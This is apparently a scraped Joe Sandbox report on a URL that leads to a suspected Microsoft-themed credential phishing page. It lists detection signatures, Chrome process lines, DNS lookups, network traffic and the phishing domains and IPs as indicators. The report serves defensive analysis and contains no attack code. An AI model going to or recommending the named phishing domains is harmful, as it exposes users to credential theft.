Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://pozaweclip.upnana.com/

Overview

General Information

Sample URL:https://pozaweclip.upnana.com/
Analysis ID:1585566

Detection

Score:48
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
HTML body contains low number of good links
HTML body contains password input but no form action
HTML body with high number of embedded images detected
HTML title does not match URL
Invalid T&C link found
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 6312 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6988 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 --field-trial-handle=1948,i,17286567083323635989,10135987291637259251,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6652 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://pozaweclip.upnana.com/" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

Phishing

barindex
Source: https://you.doclabcourt.com/OhgiN/Joe Sandbox AI: Score: 9 Reasons: The brand 'Microsoft' is well-known and typically associated with the domain 'microsoft.com'., The URL 'you.doclabcourt.com' does not match the legitimate domain 'microsoft.com'., The domain 'doclabcourt.com' is not associated with Microsoft and appears suspicious., The presence of 'you.' as a subdomain is unusual and could be an attempt to mislead users., The URL structure and domain name do not align with Microsoft's typical web properties. DOM: 2.4.pages.csv
Source: https://you.doclabcourt.com/OhgiN/HTTP Parser: Number of links: 0
Source: https://you.doclabcourt.com/OhgiN/HTTP Parser: <input type="password" .../> found but no <form action="...
Source: https://you.doclabcourt.com/OhgiN/HTTP Parser: Total embedded image size: 123322
Source: https://you.doclabcourt.com/OhgiN/HTTP Parser: Title: Sharing Link Validation does not match URL
Source: https://you.doclabcourt.com/OhgiN/HTTP Parser: Invalid link: Privacy & Cookies
Source: https://you.doclabcourt.com/OhgiN/HTTP Parser: Invalid link: Privacy & Cookies
Source: https://you.doclabcourt.com/OhgiN/HTTP Parser: Invalid link: Privacy & Cookies
Source: https://you.doclabcourt.com/OhgiN/HTTP Parser: <input type="password" .../> found
Source: https://pozaweclip.upnana.com/HTTP Parser: No favicon
Source: https://you.doclabcourt.com/OhgiN/HTTP Parser: No favicon
Source: https://you.doclabcourt.com/OhgiN/HTTP Parser: No favicon
Source: https://you.doclabcourt.com/OhgiN/HTTP Parser: No favicon
Source: https://you.doclabcourt.com/OhgiN/HTTP Parser: No favicon
Source: https://you.doclabcourt.com/OhgiN/HTTP Parser: No favicon
Source: https://you.doclabcourt.com/OhgiN/HTTP Parser: No <meta name="author".. found
Source: https://you.doclabcourt.com/OhgiN/HTTP Parser: No <meta name="author".. found
Source: https://you.doclabcourt.com/OhgiN/HTTP Parser: No <meta name="author".. found
Source: https://you.doclabcourt.com/OhgiN/HTTP Parser: No <meta name="copyright".. found
Source: https://you.doclabcourt.com/OhgiN/HTTP Parser: No <meta name="copyright".. found
Source: https://you.doclabcourt.com/OhgiN/HTTP Parser: No <meta name="copyright".. found
Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\Dictionaries
Source: unknownHTTPS traffic detected: 23.56.254.164:443 -> 192.168.2.16:49739 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.56.254.164:443 -> 192.168.2.16:49740 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.16:49741 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.16:49787 version: TLS 1.2
Source: chrome.exeMemory has grown: Private usage: 27MB later: 36MB
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficDNS traffic detected: DNS query: pozaweclip.upnana.com
Source: global trafficDNS traffic detected: DNS query: cdn.jsdelivr.net
Source: global trafficDNS traffic detected: DNS query: defendium.com
Source: global trafficDNS traffic detected: DNS query: attachments.office.net
Source: global trafficDNS traffic detected: DNS query: outlook.office.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: exo.nel.measure.office.net
Source: global trafficDNS traffic detected: DNS query: api.defendium.com
Source: global trafficDNS traffic detected: DNS query: you.doclabcourt.com
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: maxcdn.bootstrapcdn.com
Source: global trafficDNS traffic detected: DNS query: stackpath.bootstrapcdn.com
Source: global trafficDNS traffic detected: DNS query: 7509147325-1323985617.cos.na-siliconvalley.myqcloud.com
Source: global trafficDNS traffic detected: DNS query: 7509147325.lawyersfederalcourt.com
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownHTTPS traffic detected: 23.56.254.164:443 -> 192.168.2.16:49739 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.56.254.164:443 -> 192.168.2.16:49740 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.16:49741 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.16:49787 version: TLS 1.2
Source: classification engineClassification label: mal48.phis.win@20/29@60/380
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Program Files\Google\Chrome\Application\Dictionaries
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 --field-trial-handle=1948,i,17286567083323635989,10135987291637259251,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://pozaweclip.upnana.com/"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 --field-trial-handle=1948,i,17286567083323635989,10135987291637259251,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\Dictionaries
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
Registry Run Keys / Startup Folder
1
Process Injection
3
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System2
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
Extra Window Memory Injection
1
Extra Window Memory Injection
Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://pozaweclip.upnana.com/0%Avira URL Cloudsafe
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
jsdelivr.map.fastly.net
151.101.65.229
truefalse
    high
    stackpath.bootstrapcdn.com
    104.18.11.207
    truefalse
      high
      a.nel.cloudflare.com
      35.190.80.1
      truefalse
        high
        api.defendium.com
        52.22.98.93
        truefalse
          unknown
          maxcdn.bootstrapcdn.com
          104.18.10.207
          truefalse
            high
            HHN-efz.ms-acdc.office.com
            52.98.179.66
            truefalse
              unknown
              you.doclabcourt.com
              104.21.60.2
              truetrue
                unknown
                pozaweclip.upnana.com
                54.225.228.99
                truefalse
                  unknown
                  ooc-g2.tm-4.office.com
                  52.98.242.242
                  truefalse
                    high
                    code.jquery.com
                    151.101.194.137
                    truefalse
                      high
                      cdnjs.cloudflare.com
                      104.17.24.14
                      truefalse
                        high
                        cos.na-siliconvalley.myqcloud.com
                        170.106.97.195
                        truefalse
                          unknown
                          challenges.cloudflare.com
                          104.18.95.41
                          truefalse
                            high
                            defendium.com
                            52.22.98.93
                            truefalse
                              unknown
                              7509147325.lawyersfederalcourt.com
                              162.241.149.91
                              truefalse
                                unknown
                                www.google.com
                                216.58.206.36
                                truefalse
                                  high
                                  cdn.jsdelivr.net
                                  unknown
                                  unknownfalse
                                    high
                                    outlook.office.com
                                    unknown
                                    unknownfalse
                                      high
                                      attachments.office.net
                                      unknown
                                      unknownfalse
                                        unknown
                                        7509147325-1323985617.cos.na-siliconvalley.myqcloud.com
                                        unknown
                                        unknownfalse
                                          unknown
                                          exo.nel.measure.office.net
                                          unknown
                                          unknownfalse
                                            unknown
                                            NameMaliciousAntivirus DetectionReputation
                                            https://pozaweclip.upnana.com/false
                                              unknown
                                              https://you.doclabcourt.com/OhgiN/true
                                                unknown
                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs
                                                IPDomainCountryFlagASNASN NameMalicious
                                                142.250.185.99
                                                unknownUnited States
                                                15169GOOGLEUSfalse
                                                142.250.185.206
                                                unknownUnited States
                                                15169GOOGLEUSfalse
                                                104.18.10.207
                                                maxcdn.bootstrapcdn.comUnited States
                                                13335CLOUDFLARENETUSfalse
                                                104.18.94.41
                                                unknownUnited States
                                                13335CLOUDFLARENETUSfalse
                                                104.21.60.2
                                                you.doclabcourt.comUnited States
                                                13335CLOUDFLARENETUStrue
                                                2.19.126.89
                                                unknownEuropean Union
                                                16625AKAMAI-ASUSfalse
                                                216.58.206.36
                                                www.google.comUnited States
                                                15169GOOGLEUSfalse
                                                142.250.185.163
                                                unknownUnited States
                                                15169GOOGLEUSfalse
                                                52.98.179.66
                                                HHN-efz.ms-acdc.office.comUnited States
                                                8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                151.101.194.137
                                                code.jquery.comUnited States
                                                54113FASTLYUSfalse
                                                170.106.97.196
                                                unknownSingapore
                                                132203TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCNfalse
                                                35.190.80.1
                                                a.nel.cloudflare.comUnited States
                                                15169GOOGLEUSfalse
                                                170.106.97.195
                                                cos.na-siliconvalley.myqcloud.comSingapore
                                                132203TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCNfalse
                                                172.217.18.10
                                                unknownUnited States
                                                15169GOOGLEUSfalse
                                                142.250.184.228
                                                unknownUnited States
                                                15169GOOGLEUSfalse
                                                142.250.186.74
                                                unknownUnited States
                                                15169GOOGLEUSfalse
                                                142.250.186.138
                                                unknownUnited States
                                                15169GOOGLEUSfalse
                                                104.17.24.14
                                                cdnjs.cloudflare.comUnited States
                                                13335CLOUDFLARENETUSfalse
                                                1.1.1.1
                                                unknownAustralia
                                                13335CLOUDFLARENETUSfalse
                                                108.177.15.84
                                                unknownUnited States
                                                15169GOOGLEUSfalse
                                                104.18.186.31
                                                unknownUnited States
                                                13335CLOUDFLARENETUSfalse
                                                172.217.16.206
                                                unknownUnited States
                                                15169GOOGLEUSfalse
                                                52.22.98.93
                                                api.defendium.comUnited States
                                                14618AMAZON-AESUSfalse
                                                151.101.65.229
                                                jsdelivr.map.fastly.netUnited States
                                                54113FASTLYUSfalse
                                                52.98.242.242
                                                ooc-g2.tm-4.office.comUnited States
                                                8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                104.18.95.41
                                                challenges.cloudflare.comUnited States
                                                13335CLOUDFLARENETUSfalse
                                                2.16.168.113
                                                unknownEuropean Union
                                                20940AKAMAI-ASN1EUfalse
                                                104.18.11.207
